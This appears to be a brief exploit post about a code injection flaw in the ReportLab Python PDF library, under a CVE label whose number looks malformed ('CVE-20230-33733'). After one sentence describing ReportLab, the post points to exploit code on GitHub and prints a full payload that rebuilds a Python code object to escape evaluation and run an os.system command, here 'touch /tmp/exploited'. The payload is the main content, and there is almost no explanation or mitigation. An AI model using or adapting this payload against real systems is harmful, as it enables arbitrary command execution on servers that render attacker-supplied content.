Web CODE INJECTION IN REPORTLAB Python LIBRARY (CVE-20230-33733)

[fikri]

Reportlab is an Open Source project that allows the creation of documents in Adobe's Portable Document Format (PDF) using the Python programming language.

Exploit Code: Github

Payload:

[
    [
        [
             [
                 ftype(ctype(0, 0, 0, 0, 3, 67, b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00',
                       (None, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\x12\x01'), {})()
                 for ftype in [type(lambda: None)]
             ]
             for ctype in [type(getattr(lambda: {None}, Word('__code__')))]
        ]
        for Word in [orgTypeFun('Word', (str,), {
            'mutated': 1,
            'startswith': lambda self, x: False,
            '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x,
            'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
            '__hash__': lambda self: hash(str(self))
        })]
    ]
    for orgTypeFun in [type(type(1))]
]